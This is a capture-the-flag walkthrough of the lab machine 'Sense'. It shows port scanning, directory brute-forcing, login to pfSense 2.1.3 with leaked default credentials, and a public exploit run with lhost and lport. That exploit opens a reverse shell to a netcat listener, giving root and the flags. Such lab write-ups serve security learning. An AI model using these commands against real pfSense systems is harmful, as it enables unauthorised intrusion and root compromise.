I’ll preface this post by saying that this machine was unusually easy, i don’t think I completed it as the author intended. But ill post my walkthrough anyhow.
I started by running Nmap against the machine:
# Nmap 7.91 scan initiated Mon Jan 18 13:16:52 2021 as: nmap -p- -oN scan -sC -sV 10.10.10.60 Nmap scan report for 10.10.10.60 Host is up (0.046s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Did not follow redirect to https://10.10.10.60/ 443/tcp open ssl/https? | ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US | Not valid before: 2017-10-14T19:21:35 |_Not valid after: 2023-04-06T19:21:35 |_ssl-date: TLS randomness does not represent time Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jan 18 13:21:34 2021 -- 1 IP address (1 host up) scanned in 282.03 seconds
From the output you can see there are 2 ports open. Port 80 and 443. Port 80 however appears to simply redirect to 443.
I browsed to port 443 and was greeted with a pfsense login page:
I tried the default pfsense credentials of admin:pfsense but they were unsuccessful. I then ran GoBuster against the machine to try and find some hidden directories:
┌──(root💀kali)-[/usr/share/webshells/asp] └─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url https://10.10.10.60 -x htm,html,txt,php -k 1 ⨯ =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://10.10.10.60 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: htm,html,txt,php [+] Timeout: 10s =============================================================== 2021/01/20 12:53:29 Starting gobuster =============================================================== /index.html (Status: 200) /index.php (Status: 200) /help.php (Status: 200) /themes (Status: 301) /stats.php (Status: 200) /css (Status: 301) /edit.php (Status: 200) /includes (Status: 301) /license.php (Status: 200) /system.php (Status: 200) /status.php (Status: 200) /javascript (Status: 301) /changelog.txt (Status: 200) /classes (Status: 301) /exec.php (Status: 200) /widgets (Status: 301) /graph.php (Status: 200) /tree (Status: 301) /wizard.php (Status: 200) /shortcuts (Status: 301) /pkg.php (Status: 200) /installer (Status: 301) /wizards (Status: 301) /xmlrpc.php (Status: 200) /reboot.php (Status: 200) /interfaces.php (Status: 200) /csrf (Status: 301) /system-users.txt (Status: 200) /filebrowser (Status: 301) /%7Echeckout%7E (Status: 403) =============================================================== 2021/01/20 13:52:12 Finished ===============================================================
A number of directories were found, the 2 that stuck out to me were system-users.txt and changelog.txt. Changelog contained the following:
# Security Changelog ### Issue There was a failure in updating the firewall. Manual patching is therefore required ### Mitigated 2 of 3 vulnerabilities have been patched. ### Timeline The remaining patches will be installed during the next maintenance window
And System-users.txt contains:
####Support ticket### Please create the following user username: Rohit password: company defaults
Based on this information. I tried to re-login to pfsense using the rohit username and pfsense as the default password. This was successful and I was able to login.
From the dashboard we can see that pfsense version 2.1.3 is running. I googled for exploits affecting this version of pfsense and discovered THIS one. I downloaded the python exploit and looked through the code. It creates a reverse shell back to the machine specified in the lhost and lport arguments. I started a netcat listener on port 2600:
┌──(root💀kali)-[/usr/share/wordlists/SecLists/Passwords] └─# nc -nvlp 2600 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2600 Ncat: Listening on 0.0.0.0:2600
I then ran the exploit against the sense machine:
┌──(root💀kali)-[/home/kali/Documents/sense] └─# python3 43560 --rhost 10.10.10.60 --lhost 10.10.14.14 --lport 2600 --username rohit --password pfsense CSRF token obtained Running exploit... Exploit completed
The exploit reported to have completed. I then checked the netcat listener and saw that it successfully captured the reverse shell.
┌──(root💀kali)-[/usr/share/wordlists/SecLists/Passwords] └─# nc -nvlp 2600 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2600 Ncat: Listening on 0.0.0.0:2600 Ncat: Connection from 10.10.10.60. Ncat: Connection from 10.10.10.60:12846. sh: can't access tty; job control turned off # whoami root # cd / # cd /home # ls .snap rohit # cd rohit # ls .tcshrc user.txt # cat user.txt [REDACTED] # cd .. # cd root # ls .cshrc .first_time .gitsync_merge.sample .hushlogin .login .part_mount .profile .shrc .tcshrc root.txt # cat root.txt [REDACTED]
As you can see from the output, the captured reverse shell is a root shell. From this shell I was able to capture both the user and root flags.